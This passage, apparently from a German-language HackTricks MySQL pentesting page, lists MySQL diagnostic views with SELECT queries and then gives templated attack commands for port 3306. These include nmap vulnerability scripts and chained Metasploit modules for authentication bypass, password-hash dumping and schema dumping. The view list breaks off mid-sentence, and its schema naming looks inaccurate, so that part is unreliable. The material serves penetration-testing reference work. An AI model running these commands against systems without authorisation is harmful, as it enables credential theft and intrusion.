  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten nach Host in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$host_summary;

X$Host_Summary_By_File_IO

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten nach Host und Datei-E/A in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$host_summary_by_file_io;

X$Host_Summary_By_File_IO_Type

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten nach Host, Datei-E/A-Typ in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$host_summary_by_file_io_type;

X$Host_Summary_By_Stages

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten nach Host und Phasen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$host_summary_by_stages;

X$Host_Summary_By_Statement_Latency

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten nach Host und Anweisungsverzögerung in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$host_summary_by_statement_latency;

X$Host_Summary_By_Statement_Type

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten nach Host und Anweisungstyp in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$host_summary_by_statement_type;

X$Innodb_Buffer_Stats_By_Schema

  • Beschreibung: Diese Ansicht enthält Statistiken zu den InnoDB-Pufferdaten nach Schema in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$innodb_buffer_stats_by_schema;

X$Innodb_Buffer_Stats_By_Table

  • Beschreibung: Diese Ansicht enthält Statistiken zu den InnoDB-Pufferdaten nach Tabelle in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$innodb_buffer_stats_by_table;

X$Innodb_Lock_Waits

  • Beschreibung: Diese Ansicht enthält Informationen zu den InnoDB-Sperrwartungen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$innodb_lock_waits;

X$IO_By_Thread_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zur E/A nach Thread und Verzögerung in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$io_by_thread_by_latency;

X$IO_Global_By_File_By_Bytes

  • Beschreibung: Diese Ansicht enthält Informationen zur globalen E/A nach Datei und Bytes in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$io_global_by_file_by_bytes;

X$IO_Global_By_File_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zur globalen E/A nach Datei und Verzögerung in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$io_global_by_file_by_latency;

X$IO_Global_By_Wait_By_Bytes

  • Beschreibung: Diese Ansicht enthält Informationen zur globalen E/A nach Wartezeit und Bytes in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$io_global_by_wait_by_bytes;

X$IO_Global_By_Wait_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zur globalen E/A nach Wartezeit und Verzögerung in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$io_global_by_wait_by_latency;

X$Latest_File_IO

  • Beschreibung: Diese Ansicht enthält Informationen zur letzten Datei-E/A in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$latest_file_io;

X$Memory_By_Host_By_Current_Bytes

  • Beschreibung: Diese Ansicht enthält Informationen zum Speicher nach Host und aktuellen Bytes in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$memory_by_host_by_current_bytes;

X$Memory_By_Thread_By_Current_Bytes

  • Beschreibung: Diese Ansicht enthält Informationen zum Speicher nach Thread und aktuellen Bytes in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$memory_by_thread_by_current_bytes;

X$Memory_By_User_By_Current_Bytes

  • Beschreibung: Diese Ansicht enthält Informationen zum Speicher nach Benutzer und aktuellen Bytes in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$memory_by_user_by_current_bytes;

X$Memory_Global_By_Current_Bytes

  • Beschreibung: Diese Ansicht enthält Informationen zum globalen Speicher nach aktuellen Bytes in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$memory_global_by_current_bytes;

X$Memory_Global_Total

  • Beschreibung: Diese Ansicht enthält Informationen zum gesamten globalen Speicher in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$memory_global_total;

X$Processlist

  • Beschreibung: Diese Ansicht enthält Informationen zur aktuellen Prozessliste in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$processlist;

X$Ps_Digest_95th_Percentile_By_Avg_Us

  • Beschreibung: Diese Ansicht enthält Informationen zum 95. Perzentil der durchschnittlichen Verzögerung von Prozessdigesten in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$ps_digest_95th_percentile_by_avg_us;

X$Ps_Digest_Avg_Latency_Distribution

  • Beschreibung: Diese Ansicht enthält Informationen zur Verteilung der durchschnittlichen Verzögerung von Prozessdigesten in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$ps_digest_avg_latency_distribution;

X$Ps_Schema_Table_Statistics_IO

  • Beschreibung: Diese Ansicht enthält Informationen zur E/A von Prozessdigesten nach Schema und Tabelle in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$ps_schema_table_statistics_io;

X$Schema_Flattened_Keys

  • Beschreibung: Diese Ansicht enthält Informationen zu den flachen Schlüsseln des Schemas in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$schema_flattened_keys;

X$Schema_Index_Statistics

  • Beschreibung: Diese Ansicht enthält Statistiken zu den Indizes des Schemas in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$schema_index_statistics;

X$Schema_Table_Lock_Waits

  • Beschreibung: Diese Ansicht enthält Informationen zu den Sperrwartungen der Schematabellen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$schema_table_lock_waits;

X$Schema_Table_Statistics

  • Beschreibung: Diese Ansicht enthält Statistiken zu den Tabellen des Schemas in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.x$schema_table_statistics;

X$Schema_Table_Statistics_With_Buffer

  • Beschreibung: Diese Ansicht
Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.xyz/pentesting/pentesting-mysql

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

RootedCON ist die relevanteste Cybersicherheitsveranstaltung in Spanien und eine der wichtigsten in Europa. Mit der Mission, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin.

{% embed url="https://www.rootedcon.com/" %}

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: